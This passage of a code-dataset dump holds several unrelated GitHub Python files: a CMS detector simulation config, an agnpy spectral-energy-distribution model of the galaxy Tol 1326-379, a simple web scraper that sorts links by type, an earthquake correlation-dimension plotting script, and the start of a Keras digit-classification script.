dotList(self):\n\t\trPoints = []\n\t\tfor i in self.particles:\n\t\t\trPoints.append((i.position,i.size,i.color))\n\t\treturn rPoints\n\nclass PH_FP(tuple):\n\tdef __add__(self, other):\n\t\tif len(self) != len(other):\n\t\t\traise ValueError(\"tuple lengths don't match\")\n\t\treturn PH_FP(x + y for (x, y) in zip(self, other))\n\tdef __int__(self):\n\t\treturn tuple(int(x) for x in self)\n\n\tdef __mul__(self,other):\n\t\treturn PH_FP(x*other for x in self)\n\n\tdef __sub__(self,other):\n\t\treturn PH_FP(x - y for (x,y) in zip(self,other))\n\n\tdef __div__(self,other):\n\t\treturn PH_FP([float(x/float(other)) for x in self])","repo_name":"Tortuginator/PixelWall","sub_path":"PixelWall/PresetAnimations/ForcesOfPhysics.py","file_name":"ForcesOfPhysics.py","file_ext":"py","file_size_in_byte":5041,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"40235022630","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"PROD\")\nprocess.load(\"SimG4CMS.Calo.PythiaMinBias_cfi\")\nprocess.load(\"SimGeneral.HepPDTESSource.pythiapdt_cfi\")\nprocess.load(\"IOMC.EventVertexGenerators.VtxSmearedGauss_cfi\")\nprocess.load(\"Geometry.CMSCommonData.ecalhcalGeometryXML_cfi\")\nprocess.load(\"Geometry.EcalCommonData.ecalSimulationParameters_cff\")\nprocess.load(\"Geometry.HcalCommonData.hcalDDConstants_cff\")\nprocess.load(\"Geometry.MuonNumbering.muonGeometryConstants_cff\")\nprocess.load(\"Geometry.MuonNumbering.muonOffsetESProducer_cff\")\nprocess.load(\"Configuration.StandardSequences.MagneticField_cff\")\nprocess.load(\"Configuration.EventContent.EventContent_cff\")\nprocess.load('Configuration.StandardSequences.Generator_cff')\nprocess.load('Configuration.StandardSequences.SimIdeal_cff')\nprocess.load(\"Configuration.StandardSequences.FrontierConditions_GlobalTag_cff\")\nfrom Configuration.AlCa.autoCond import autoCond\nprocess.GlobalTag.globaltag = autoCond['run1_mc']\n\nprocess.MessageLogger = cms.Service(\"MessageLogger\",\n cerr = cms.untracked.PSet(\n enable = cms.untracked.bool(False)\n ),\n cout = cms.untracked.PSet(\n CaloSim = cms.untracked.PSet(\n limit = cms.untracked.int32(0)\n ),\n DEBUG = cms.untracked.PSet(\n limit = cms.untracked.int32(0)\n ),\n EcalGeom = cms.untracked.PSet(\n limit = cms.untracked.int32(0)\n ),\n EcalSim = cms.untracked.PSet(\n limit = cms.untracked.int32(0)\n ),\n HCalGeom = cms.untracked.PSet(\n limit = cms.untracked.int32(0)\n ),\n HFShower = cms.untracked.PSet(\n limit = cms.untracked.int32(-1)\n ),\n HcalSim = cms.untracked.PSet(\n limit = cms.untracked.int32(-1)\n ),\n INFO = cms.untracked.PSet(\n limit = cms.untracked.int32(-1)\n ),\n enable = cms.untracked.bool(True),\n threshold = cms.untracked.string('DEBUG')\n ),\n debugModules = cms.untracked.vstring('*')\n)\n\nprocess.load(\"IOMC.RandomEngine.IOMC_cff\")\nprocess.RandomNumberGeneratorService.generator.initialSeed = 456789\nprocess.RandomNumberGeneratorService.g4SimHits.initialSeed = 9876\nprocess.RandomNumberGeneratorService.VtxSmeared.initialSeed = 123456789\nprocess.rndmStore = cms.EDProducer(\"RandomEngineStateProducer\")\n\nprocess.Timing = cms.Service(\"Timing\")\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(10)\n)\n\nprocess.source = cms.Source(\"EmptySource\")\n\nprocess.output = cms.OutputModule(\"PoolOutputModule\",\n process.FEVTSIMEventContent,\n fileName = cms.untracked.string('simevent.root')\n)\n\nprocess.generation_step = cms.Path(process.pgen)\nprocess.simulation_step = cms.Path(process.psim)\nprocess.out_step = cms.EndPath(process.output)\n\nprocess.g4SimHits.Physics.type = 'SimG4Core/Physics/DummyPhysics'\nprocess.g4SimHits.Physics.DummyEMPhysics = True\nprocess.g4SimHits.Watchers = cms.VPSet(cms.PSet(\n CheckForHighEtPhotons = cms.untracked.bool(False),\n TrackMin = cms.untracked.int32(0),\n TrackMax = cms.untracked.int32(0),\n TrackStep = cms.untracked.int32(1),\n EventMin = cms.untracked.int32(0),\n EventMax = cms.untracked.int32(0),\n EventStep = cms.untracked.int32(1),\n PDGids = cms.untracked.vint32(),\n VerboseLevel = cms.untracked.int32(0),\n G4Verbose = cms.untracked.bool(True),\n DEBUG = cms.untracked.bool(False),\n type = cms.string('TrackingVerboseAction')\n))\n\n# Schedule definition \nprocess.schedule = cms.Schedule(process.generation_step,\n process.simulation_step,\n process.out_step\n )\n\n# filter all path with the production filter sequence \nfor path in process.paths:\n getattr(process,path)._seq = process.generator * getattr(process,path)._seq\n","repo_name":"cms-sw/cmssw","sub_path":"SimG4CMS/Calo/test/python/run_cfg.py","file_name":"run_cfg.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"en","doc_type":"code","stars":985,"dataset":"github-code","pt":"50"} +{"seq_id":"29309703258","text":"import numpy as np \nimport matplotlib.pyplot as plt \nfrom astropy import units as u\nfrom astropy import constants as const\nimport pandas as pd\nfrom astropy.constants import c\nfrom agnpy.spectra import ElectronDistribution\nfrom astropy.cosmology import FlatLambdaCDM\nfrom agnpy.emission_regions import Blob\nfrom agnpy.synchrotron import Synchrotron\nfrom agnpy.compton import SynchrotronSelfCompton\nfrom agnpy.utils.plot import plot_sed\nimport matplotlib.pyplot as plt\nfrom agnpy.utils.plot import load_mpl_rc\nfrom agnpy.spectra import BrokenPowerLaw\nfrom astropy.coordinates import Distance\nfrom astropy.table import Table\nfrom agnpy.emission_regions import Blob\n\n\n\n###Information###\n#We model the SED in two different scenarios, namely\n#assuming (1) that the jet is closely aligned toward the observer (as\n#for the case of blazars) and has a large Lorentz factor (blazar case)\n#or (2) that the jet is misaligned and slow (radiogalaxy case).\n\n# Global variables for Tol 1326-379\nN = 300 \nz = 0.0284 \nvelocity = 8595*10**(3) * u.m/(u.s) #8595 kms^-1 #velocity of the host galaxy \nviewing_angle_1 = 5.0*np.pi/180 #rad np.cos(x) where x is in radiens\nviewing_angle_2 = 30.0*np.pi/180\nB_1 = 0.1*u.G\nB_2 = 0.2*u.G \ngamma_min_1 = 400.0 \ngamma_min_2 = 100.0 \ngamma_break_1 = 5.0*10**3 \ngamma_break_2 = 1.0*10**4 \ngamma_max_1 = 3.0*10**4 \ngamma_max_2 = 3*10**4 \nGamma_1 = 10.0\nGamma_2 = 2.0\nR_1 = 3.5*10**(15)*u.cm\nR_2 = 5.0*10**(16)*u.cm\nP_e_1 = 1.2*10**(44)*u.erg*1/(u.s)\nP_e_2 = 3.5*10**(43)*u.erg*1/(u.s)\nP_j_1 = 2.7*10**(44)*u.erg*1/(u.s)\nP_j_2 = 1.6*10**(44)*u.erg*1/(u.s)\np1 = 2.0 \np2 = 4.8 \n\n\n#Luminocity distance \ncosmo = FlatLambdaCDM(H0 = 70, Om0 = 0.3, Tcmb0 = 2.725)\ndistanceL = cosmo.luminosity_distance(z) #unit: Mpc\ndis = Distance(z=z).to(\"cm\")\n\n\n# Reading in the data with pandas\ndf_1 = pd.read_csv('values.csv')\n\n# Data with relativistic boosting (as they were presented in Tavacchio)\nx_v = df_1[\"energy\"].copy()\ny_v = df_1[\"flux\"].copy()\nerror_bars = df_1[\"flux_error\"].copy()\n\n# Doppler factor\ndef relativistic_doppler_factor(Gamma,viewing_angle): \n beta = np.sqrt(1 - 1/(Gamma**2))\n doppler_factor = 1/(Gamma*(1-beta* np.cos(viewing_angle)))\n return doppler_factor\n\n\n# doppler values fror _1 blazar case, _2 raidogalaxy case\ndoppler_1 = relativistic_doppler_factor(Gamma_1,viewing_angle_1)\ndoppler_2 = relativistic_doppler_factor(Gamma_2,viewing_angle_2)\n\nprint(\"doppler1:\", doppler_1)\nprint(\"doppler2: \", doppler_2)\n\n# make the x and y values into numpy arrays\nx_v_boosted = np.array(x_v) #*u.Hz\ny_v_boosted = np.array(y_v) # * (u.erg/( u.s * u.cm *u.cm ))\nerrorbars_boosted = np.array(error_bars) #* (u.erg/( u.s * u.cm *u.cm ))\n\n\n# x-axis\nfrequancy = np.logspace(9, 25, N) * u.Hz\n\n\n##Find the normalization \n\n\nU1 = 9/4 * P_e_1/(2*np.pi * Gamma_1**2 *R_1**2 * const.c.cgs) #* 4/3\nU2 = 9/4 * P_e_2/(2*np.pi * Gamma_2**2 *R_2**2 * const.c.cgs) #* 4/3\nEL = ElectronDistribution()\nBPL = BrokenPowerLaw()\n#SSC = SynchrotronSelfCompton()\n#SYN = Synchrotron()\n\nk_e1_result = BPL.from_normalised_energy_density(U1,gamma_min = gamma_min_1, gamma_max= gamma_max_1,p1= 2, p2=4.8, gamma_b= gamma_break_1)\nk_e2_result = BPL.from_normalised_energy_density(U2, gamma_min = gamma_min_2, gamma_max= gamma_max_2,p1= 2, p2=4.8, gamma_b= gamma_break_2)\n\nk_e1 = k_e1_result.k_e\nk_e2 = k_e2_result.k_e\nprint(\"ke1: \", k_e1)\nprint(\"ke2: \", k_e2)\n\n# theese values where used for the test case used under: \n#k_e1 = 9*10**(-3) * u.Unit(\"cm-3\") \n#k_e2 = 9.18*10**(-5) * u.Unit(\"cm-3\") \n\n\n## Synchotron and SynchotronSelfCompton \n# 1: blazar case \n# 2: radiogalaxy case\n\n\n# Method 1. define the emmisikon region with the Blob class\nparameters_1 = { \n \"p1\": p1, \n \"p2\": p2,\n \"gamma_b\": gamma_break_1,\n \"gamma_min\" : gamma_min_1, \n \"gamma_max\": gamma_max_1,\n\n}\n\nparameters_2 = { \n \"p1\": p1, \n \"p2\": p2,\n \"gamma_b\": gamma_break_2,\n \"gamma_min\" : gamma_min_2, \n \"gamma_max\": gamma_max_2,\n\n}\n\n\nspectrum_dict_1 = {\"type\": \"BrokenPowerLaw\", \"parameters\": parameters_1}\nspectrum_dict_2 = {\"type\": \"BrokenPowerLaw\", \"parameters\": parameters_2}\n\n\nblob_1 = Blob(R_1,z,doppler_1, Gamma_1, B_1, k_e1, spectrum_dict_1, spectrum_norm_type=\"differential\" )\nblob_2 = Blob(R_2,z,doppler_2, Gamma_2, B_2, k_e2, spectrum_dict_2, spectrum_norm_type=\"differential\" )\n#print(\"blob1: \", blob_1)\n#print(\"blob2: \", blob_2)\n\n# have to use spectrum_norm_type = \"differential\", because we are using k_e to normalize the electron spectra (we could also have used n_e_tot or W_e)\n#print(blob)\n\n\n# The power of the jet\n#print(f\"jet power in particles blob 1: {blob_1.P_jet_e:.2e}\")\n#print(f\"jet power in particles blob 2: {blob_2.P_jet_e:.2e}\")\n#print(f\" jet power in B_1: {blob_1.P_jet_B:.2e}\")\n#print(f\" jet power in B_2: {blob_2.P_jet_B:.2e}\")\n\n\n# define the radiative processes\nsynch_1 = Synchrotron(blob_1,ssa= True)\nssc_1 = SynchrotronSelfCompton(blob_1,ssa = True)\n\nsynch_2 = Synchrotron(blob_2,ssa= True)\nssc_2 = SynchrotronSelfCompton(blob_2,ssa = True)\n\n\n\nsynch_sed_1 = synch_1.sed_flux(frequancy)\nsynch_sed_2 = synch_2.sed_flux(frequancy)\nssc_sed_1 = ssc_1.sed_flux(frequancy)\nssc_sed_2 = ssc_2.sed_flux(frequancy)\n\n\n\n# Method 2. use the other sed_flux function, which is the .evaluate_sed_flux \ndef calc(x,z_value, Luminocity_distance, doppler_value, magnetic_field, Radius,k_ee,power_1,power_2, G_break, G_min, G_max):\n synch = Synchrotron.evaluate_sed_flux(\n x,\n z_value,\n Luminocity_distance,\n doppler_value,\n magnetic_field,\n Radius,\n BrokenPowerLaw,\n k_ee,\n power_1,\n power_2,\n G_break,\n G_min,\n G_max,\n ssa = True\n )\n\n ssc = SynchrotronSelfCompton.evaluate_sed_flux(\n x,\n z_value,\n Luminocity_distance,\n doppler_value,\n magnetic_field,\n Radius,\n BrokenPowerLaw,\n k_ee,\n power_1,\n power_2,\n G_break,\n G_min,\n G_max,\n ssa = True\n )\n\n return synch + ssc\n\n\n# PLOTS\n\n#The # correspond the the numbering of the figures. \n# 1: Blazar case \n# 2: radiogalaxy case\n\n# matplotlib adjustments\nload_mpl_rc()\n\n# Plotting the data points \nplt.scatter(x_v_boosted,y_v_boosted,label = \"data\", color = \"royalblue\")\nplt.errorbar(x_v_boosted, y_v_boosted, yerr = error_bars, xerr = 0, color = \"royalblue\", fmt= \"none\")\n\n#1: Blazar Case \n#plot_sed(frequancy, synch_sed_1, label = \"Synchrotron\")\n#plot_sed(frequancy, ssc_sed_1, label = \"SSC\")\n#plot_sed(frequancy, synch_sed_1+ssc_sed_1, label = \"Sum\")\n#plot_sed(frequancy, calc(frequancy,z, dis, doppler_1, B_1, R_1, k_e1,p1,p2,gamma_break_1, gamma_min_1, gamma_max_1 ), label=\"syn + ssc\", color = \"red\")\n#plt.ylim(10**-16,10**-7)\n#plt.savefig(\"Tol1326379_blazar_case.png\")\n\n\n#print(blob_2.Gamma)\n\n# 2: radiogalaxy case \nplot_sed(frequancy,synch_sed_2, label = \"Synchrotron\")\nplot_sed(frequancy,ssc_sed_2, label = \"SSC\")\nplot_sed(frequancy,synch_sed_2+ssc_sed_2, label = \"Sum\")\nplot_sed(frequancy, calc(frequancy,z, dis, doppler_2, B_2, R_2, k_e2,p1,p2,gamma_break_2, gamma_min_2, gamma_max_2 ), label=\"syn + ssc\", color = \"red\")\nplt.ylim(10**-16,10**-10)\nplt.savefig(\"Tol1326379_radiogalaxy_case.png\")\n\n\n\n# Plotting with other values for the normalization\n#plot_sed(frequancy, calc(frequancy,z, dis, doppler_1, B_1, R_1, k_e1,p1,p2,gamma_break_1, gamma_min_1, gamma_max_1 ), label=\"blazar\", color = \"darkorange\")\n#plot_sed(frequancy, calc(frequancy,z, dis, doppler_2, B_2, R_2, k_e2,p1,p2,gamma_break_2, gamma_min_2, gamma_max_2 ), label=\"radio galaxy\", color = \"black\")\n#plt.ylim(3 * 10**-16,5 *10**-11)\n#plt.savefig(\"Testplot.png\")\n#plt.show()","repo_name":"theresp1/Multimessenger-modelling-of-FR0-radio-galaxies","sub_path":"Tol_1326-379.py","file_name":"Tol_1326-379.py","file_ext":"py","file_size_in_byte":8149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"24128510324","text":"import requests, settings, datetime\r\nfrom bs4 import BeautifulSoup\r\n\r\nclass Webpage(object):\r\n def __init__(self, url):\r\n self.site = url\r\n self.request = \"\"\r\n self.status_code = 0\r\n self.s = settings.Settings()\r\n self.links = {\r\n \"internal\": [],\r\n \"external\": [],\r\n \"mail\": []\r\n }\r\n self.scheme = [\"http\", \"https\"]\r\n self.domains = [\".com\",\".co\",\".app\",\".online\",\".space\",\".store\",\".tech\",\".net\",\".org\",\".club\",\".design\",\".shop\",\r\n \".site\",\".io\",\".me\",\".us\",\".ca\",\".ac\",\".academy\",\".accountant\",\".accountants\",\".actor\",\".adult\",\".ae.org\",\".ae\",\r\n \".af\",\".africa\",\".ag\",\".agency\",\".ai\",\".am\",\".apartments\",\".com.ar\",\".archi\",\".art\",\".as\",\".asia\",\".associates\",\r\n \".at\",\".attorney\",\".com.au\",\".id.au\",\".net.au\",\".org.au\",\".auction\",\".band\",\".bar\",\".bargains\",\".bayern\",\".be\",\r\n \".beer\",\".berlin\",\".best\",\".bet\",\".bid\",\".bike\",\".bingo\",\".bio\",\".biz\",\".black\",\".blog\",\".blue\",\".boats\",\r\n \".boston\",\".boutique\",\".br.com\",\".brussels\",\".build\",\".builders\",\".business\",\".buzz\",\".bz\",\".cab\",\".cafe\",\".cam\",\r\n \".camera\",\".camp\",\".capetown\",\".capital\",\".cards\",\".care\",\".career\",\".careers\",\".casa\",\".cash\",\".casino\",\r\n \".catering\",\".cc\",\".center\",\".ch\",\".charity\",\".chat\",\".cheap\",\".church\",\".city\",\".cl\",\".claims\",\".cleaning\",\r\n \".click\",\".clinic\",\".clothing\",\".cloud\",\".cm\",\".cn.com\",\".co.uk\",\".coach\",\".codes\",\".coffee\",\".college\",\r\n \".cologne\",\".community\",\".company\",\".computer\",\".condos\",\".construction\",\".consulting\",\".contractors\",\".cooking\",\r\n \".cool\",\".country\",\".coupons\",\".courses\",\".credit\",\".cricket\",\".cruises\",\".cx\",\".cz\",\".dance\",\".date\",\".dating\",\r\n \".de\",\".deals\",\".degree\",\".delivery\",\".democrat\",\".dental\",\".dentist\",\".dev\",\".diamonds\",\".digital\",\".direct\",\r\n \".directory\",\".discount\",\".dk\",\".doctor\",\".dog\",\".domains\",\".download\",\".durban\",\".earth\",\".ec\",\".eco\",\r\n \".education\",\".email\",\".energy\",\".engineer\",\".engineering\",\".enterprises\",\".equipment\",\".es\",\".estate\",\".eu\",\r\n \".eu.com\",\".events\",\".exchange\",\".expert\",\".exposed\",\".express\",\".fail\",\".faith\",\".family\",\".fan\",\".fans\",\".farm\",\r\n \".fashion\",\".fi\",\".finance\",\".financial\",\".fish\",\".fishing\",\".fit\",\".fitness\",\".flights\",\".florist\",\".fm\",\r\n \".football\",\".forsale\",\".foundation\",\".fr\",\".fun\",\".fund\",\".furniture\",\".futbol\",\".fyi\",\".gallery\",\".games\",\r\n \".garden\",\".gd\",\".gg\",\".gift\",\".gifts\",\".gives\",\".gl\",\".glass\",\".global\",\".gold\",\".golf\",\".gr\",\".graphics\",\r\n \".gratis\",\".green\",\".gripe\",\".group\",\".gs\",\".guide\",\".guru\",\".gy\",\".hamburg\",\".haus\",\".health\",\".healthcare\",\r\n \".help\",\".hn\",\".hockey\",\".holdings\",\".holiday\",\".homes\",\".horse\",\".hospital\",\".host\",\".house\",\".how\",\".ht\",\".id\",\r\n \".im\",\".immo\",\".immobilien\",\".in\",\".industries\",\".info\",\".ink\",\".institute\",\".insure\",\".international\",\r\n \".investments\",\".is\",\".it\",\".je\",\".jetzt\",\".jewelry\",\".joburg\",\".jp\",\".jpn.com\",\".kaufen\",\".kim\",\".kitchen\",\r\n \".kiwi\",\".koeln\",\".kyoto\",\".la\",\".land\",\".lat\",\".lawyer\",\".lc\",\".lease\",\".legal\",\".lgbt\",\".li\",\".life\",\r\n \".lighting\",\".limited\",\".limo\",\".link\",\".live\",\".loan\",\".loans\",\".lol\",\".london\",\".love\",\".lt\",\".ltd\",\".lu\",\r\n \".luxe\",\".lv\",\".maison\",\".management\",\".market\",\".marketing\",\".mba\",\".media\",\".melbourne\",\".memorial\",\".men\",\r\n \".menu\",\".miami\",\".mn\",\".mobi\",\".moda\",\".moe\",\".mom\",\".money\",\".mortgage\",\".ms\",\".mu\",\".mx\",\".nagoya\",\".name\",\r\n \".network\",\".news\",\".ngo\",\".ninja\",\".nl\",\".nu\",\".nyc\",\".ac.nz\",\".org.nz\",\".kiwi.nz\",\".net.nz\",\".school.nz\",\r\n \".gen.nz\",\".geek.nz\",\".nz\",\".co.nz\",\".maori.nz\",\".okinawa\",\".one\",\".onl\",\".organic\",\".osaka\",\".page\",\".paris\",\r\n \".partners\",\".parts\",\".party\",\".pe\",\".pet\",\".ph\",\".photo\",\".photography\",\".photos\",\".pics\",\".pictures\",\".pink\",\r\n \".pizza\",\".pl\",\".plumbing\",\".plus\",\".pm\",\".poker\",\".porn\",\".press\",\".pro\",\".productions\",\".promo\",\".properties\",\r\n \".pt\",\".pub\",\".pw\",\".qa\",\".qpon\",\".quebec\",\".racing\",\".re\",\".realestate\",\".recipes\",\".red\",\".rehab\",\".reise\",\r\n \".reisen\",\".rent\",\".rentals\",\".repair\",\".report\",\".republican\",\".rest\",\".restaurant\",\".review\",\".reviews\",\".rip\",\r\n \".rocks\",\".rodeo\",\".ru.com\",\".run\",\".ryukyu\",\".sa.com\",\".sale\",\".salon\",\".sarl\",\".com.sb\",\".sc\",\".school\",\r\n \".schule\",\".science\",\".scot\",\".se\",\".services\",\".sexy\",\".sg\",\".com.sg\",\".sh\",\".shiksha\",\".shoes\",\".shopping\",\r\n \".show\",\".singles\",\".ski\",\".soccer\",\".social\",\".software\",\".solar\",\".solutions\",\".soy\",\".stream\",\".studio\",\r\n \".study\",\".style\",\".supplies\",\".supply\",\".support\",\".surf\",\".surgery\",\".sx\",\".sydney\",\".systems\",\".taipei\",\r\n \".tattoo\",\".tax\",\".taxi\",\".tc\",\".team\",\".technology\",\".tel\",\".tennis\",\".tf\",\".theater\",\".tienda\",\".tips\",\".tires\",\r\n \".tk\",\".tl\",\".to\",\".today\",\".tokyo\",\".tools\",\".top\",\".tours\",\".town\",\".toys\",\".trade\",\".trading\",\".training\",\r\n \".tube\",\".tv\",\".tw\",\".org.uk\",\".me.uk\",\".uk\",\".uk.com\",\".university\",\".uno\",\".us.com\",\".vacations\",\".vc\",\".vegas\",\r\n \".ventures\",\".vet\",\".vg\",\".viajes\",\".video\",\".villas\",\".vin\",\".vip\",\".vision\",\".vlaanderen\",\".vodka\",\".vote\",\r\n \".voyage\",\".wales\",\".wang\",\".watch\",\".webcam\",\".website\",\".wedding\",\".wf\",\".wien\",\".wiki\",\".win\",\".wine\",\".work\",\r\n \".world\",\".ws\",\".wtf\",\".орг\",\".xyz\",\".yoga\",\".yokohama\",\".yt\",\".co.za\",\".za.com\"]\r\n self.pageStart()\r\n\r\n '''\r\n pageRequest()\r\n Description: Takes self.site and checks if it is a valid url. If it is not a valid url,\r\n it will attempt to make it valid before sending a requests.get(). If requests.get()\r\n is valid, it is stored in requests and returned. If requests.get() is not valid,\r\n request is set to -1 and returned.\r\n Arguments: None\r\n Return: Request\r\n '''\r\n def pageRequest(self):\r\n \r\n preFix = False\r\n postFix = False\r\n \r\n # Check if site includes scheme (http:// or https://)\r\n for substring in self.scheme:\r\n if substring in self.site:\r\n preFix = True\r\n break\r\n\r\n # Check if site includes domain (.com, .org, etc)\r\n for substring in self.domains:\r\n if substring in self.site:\r\n postFix = True\r\n break\r\n try:\r\n\r\n # If scheme is missing, try adding http\r\n if preFix == False:\r\n print(\"[Error] Invalid URL: %s\" % self.site)\r\n print(\" Missing Scheme: http:// or https://\")\r\n self.site = \"http://\" + self.site\r\n print(\" Adding Scheme: %s\" % self.site)\r\n\r\n # If domain is missing, show error and return\r\n if postFix == False:\r\n print(\"[Error] Invalid URL: %s - Missing Domain\" % self.site)\r\n return -1\r\n \r\n # If domain is valid, continue with request\r\n else:\r\n request = requests.get(self.site, params=dict(\r\n query=\"web scraping\",\r\n page=2\r\n ))\r\n self.status_code = request.status_code\r\n if self.status_code != 200:\r\n print(\"[Error] Site: %s\" % self.site)\r\n print(\" Status: %d\" % self.status_code)\r\n except Exception as e:\r\n print(\"[Error] URL: %s\\n %s\" % (self.site, e))\r\n return -1\r\n\r\n return request\r\n\r\n '''\r\n pageParse()\r\n Description:\r\n Arguments:\r\n Return: Data\r\n '''\r\n def pageParse(self, tag=None):\r\n soup = BeautifulSoup(self.request.text, \"html.parser\")\r\n data = [[],[]]\r\n \r\n divs = soup.find_all(\"div\")\r\n data[0] = []\r\n for i in divs:\r\n data[0].append(i)\r\n\r\n links = soup.find_all(\"a\", href=True)\r\n for i in links:\r\n d = i[\"href\"]\r\n if d == \"#\" or d == \"/\" or d == \"\":\r\n continue\r\n if d[0:1] == \"#\" or d[0:1] == \"/\":\r\n self.links[\"internal\"].append(d)\r\n elif d[0:6] == \"mailto\":\r\n self.links[\"mail\"].append(d[7:])\r\n else:\r\n self.links[\"external\"].append(d)\r\n return data\r\n\r\n '''\r\n pageWrite()\r\n Description:\r\n Arguments:\r\n Return:\r\n '''\r\n def pageWrite(self, configuration, data):\r\n fileName = configuration[\"csv\"]\r\n with open(fileName, \"a\") as f:\r\n\r\n f.write(\"URL: \" + self.site + \"\\n\")\r\n currentDT = datetime.datetime.now()\r\n f.write(\"Time: \" + str(currentDT.strftime(\"%Y-%m-%d %H:%M:%S\")) + \"\\n\")\r\n f.write(\"TOTAL LINKS (\" + str(sum(map(len, self.links.values()))) + \")\\n\")\r\n\r\n if len(self.links[\"internal\"]) > 0:\r\n f.write(\"INTERNAL LINKS (\" + str(len(self.links[\"internal\"])) + \")\\n\")\r\n for i in self.links[\"internal\"]:\r\n f.write(str(i))\r\n if i is not self.links[\"internal\"][-1]:\r\n f.write(\",\")\r\n f.write(\"\\n\")\r\n\r\n if len(self.links[\"external\"]) > 0:\r\n f.write(\"EXTERNAL LINKS (\" + str(len(self.links[\"external\"])) + \")\\n\")\r\n for i in self.links[\"external\"]:\r\n f.write(str(i))\r\n if i is not self.links[\"external\"][-1]:\r\n f.write(\",\")\r\n f.write(\"\\n\")\r\n\r\n if len(self.links[\"mail\"]) > 0:\r\n f.write(\"MAIL LINKS (\" + str(len(self.links[\"mail\"])) + \")\\n\")\r\n for i in self.links[\"mail\"]:\r\n f.write(str(i))\r\n if i is not self.links[\"mail\"][-1]:\r\n f.write(\",\")\r\n f.write(\"\\n\")\r\n\r\n f.write(\"\\n\")\r\n\r\n print(\"[+] Data written to\", fileName)\r\n\r\n '''\r\n pageStart()\r\n Description:\r\n Arguments:\r\n Return:\r\n '''\r\n def pageStart(self):\r\n self.request = self.pageRequest()\r\n if (self.request == -1):\r\n return 0\r\n\r\n print(\"[+] Accessing \" + self.site)\r\n data = self.pageParse()\r\n\r\n if self.s.config[\"save\"] == True:\r\n self.pageWrite(self.s.config, data[0])\r\n else:\r\n return 1","repo_name":"bensherriff/webScraper","sub_path":"scraper/page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":9370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"4921305","text":"import requests\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport glob\nimport stat\nimport math\n\n\n# построение графиков зависимости\n# корреляционной размерности от размерности вложения\ndef drawCorrelationDimension(response):\n clearFolder(\n 'C:\\Учеба\\НИР\\Код\\Diploma.WebApi\\Графика на питон\\correlationDimension')\n for interval in response[\"timeIntervalCorrelationDimensions\"]:\n x = [i[\"m\"] for i in interval[\"correlationDimensions\"]]\n y = [i[\"value\"] for i in interval[\"correlationDimensions\"]]\n fig, ax = plt.subplots(nrows=1, ncols=1) # create figure & 1 axis\n ax.plot(x, y)\n # save the figure to file\n fig.savefig(\n f'C:\\Учеба\\НИР\\Код\\Diploma.WebApi\\Графика на питон\\correlationDimension\\{interval[\"minDimension\"]}---{interval[\"start\"][:10]}--{interval[\"end\"][:10]}') #\n plt.close(fig)\n\n# построение графиков корреляционных интегралов\n\n\ndef drawCorelationIntegrals(response):\n clearFolder(\n 'C:\\Учеба\\НИР\\Код\\Diploma.WebApi\\Графика на питон\\correlationIntegrals')\n for interval in response[\"timeIntervalCorrelationDimensions\"]:\n fig, ax = plt.subplots(nrows=1, ncols=1)\n ax.plot(sigmas_ln, interval[\"attractor_tmp\"])\n y = [interval[\"k_tmp\"]*x + interval[\"b_tmp\"] for x in sigmas_ln]\n ax.plot(sigmas_ln, y)\n fig.savefig(\n f'C:\\Учеба\\НИР\\Код\\Diploma.WebApi\\Графика на питон\\correlationIntegrals\\{interval[\"start\"][:10]}--{interval[\"end\"][:10]}') #\n plt.close(fig)\n\n\ndef clearFolder(path):\n files = glob.glob(path)\n for f in files:\n try:\n os.chmod(f, stat.S_IWRITE)\n os.remove(f)\n except:\n print(\"error\")\n\n# body = {\n# 'latitudeStart': 52.690478,\n# 'latitudeEnd': 60,\n# 'longtitudeStart': 155,\n# 'longtitudeEnd': 159.525422,\n# 'intervalDays': 800,\n# 'stepDays': 300\n# }\n\n\nbody = {\n 'latitudeStart': 41.55792,\n 'latitudeEnd': 44.30813,\n 'longtitudeStart': 41.06689,\n 'longtitudeEnd': 48.7793,\n 'intervalDays': 700,\n 'stepDays': 200\n}\n\n\nsigmas = [3, 2.9, 2.8, 2.7, 2.6, 2.5, 2.4, 2.3, 2.2, 2.1, 2.0, 1.9,\n 1.8, 1.7, 1.6, 1.5, 1.4, 1.3, 1.2, 1.1]\n\nsigmas_ln = [i for i in sigmas] # [math.log(i) for i in sigmas]\n\nresponse = requests.post(\n 'http://localhost:5255/api/EarthQuakes/AnalyzeEarthQuakes', json=body).json()\ndimensions = [time_interval[\"minDimension\"]\n for time_interval in response[\"timeIntervalCorrelationDimensions\"]]\nmagnitudes = [row[\"magnitude\"] for row in response[\"timeSeriesMaxMagnitudes\"]]\n\ndrawCorrelationDimension(response)\ndrawCorelationIntegrals(response)\n\n\nprint(np.corrcoef(dimensions, magnitudes)[0, 1])\n\nfig, ax = plt.subplots()\nax.plot(list(range(len(dimensions))), dimensions,\n label='Корреляционная размерность')\nax.plot(list(range(len(magnitudes))), magnitudes, label='Магнитуда')\nplt.legend()\nplt.show()\n","repo_name":"komtriangle/Diploma_work","sub_path":"Графика на питон/main3.py","file_name":"main3.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"20343260795","text":"import pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras import layers, models\nfrom keras.regularizers import l2\nfrom matplotlib import pyplot as plt\n\nEPOCHS = 100\nBATCH_SIZE = 16\nMODEL_EPOCHS = [5, 10, 5, 10, 5, 10]\nNAMES = [\"model1\", \"model2\", \"best_model1\", \"best_model2\", \"worst_model1\", \"worst_model2\"]\nDATA_FILE_NAME = \"./train.csv\"\n\ndef load_data_from_csv(file_path):\n csv_data = pd.read_csv(file_path)\n data = np.array(csv_data)\n return data\n\ndef preprocess_data(csv_data):\n labels = np.array([row[0] for row in csv_data])\n vectors = np.array([(np.array(row[1:]) / 255).reshape(-1, 28) for row in csv_data]).reshape(-1, 28, 28, 1)\n return vectors, labels\n\ndef get_accuracy(labels, predictions):\n return len([1 for i in range(len(labels)) if np.argmax(predictions[i]) == labels[i]]) 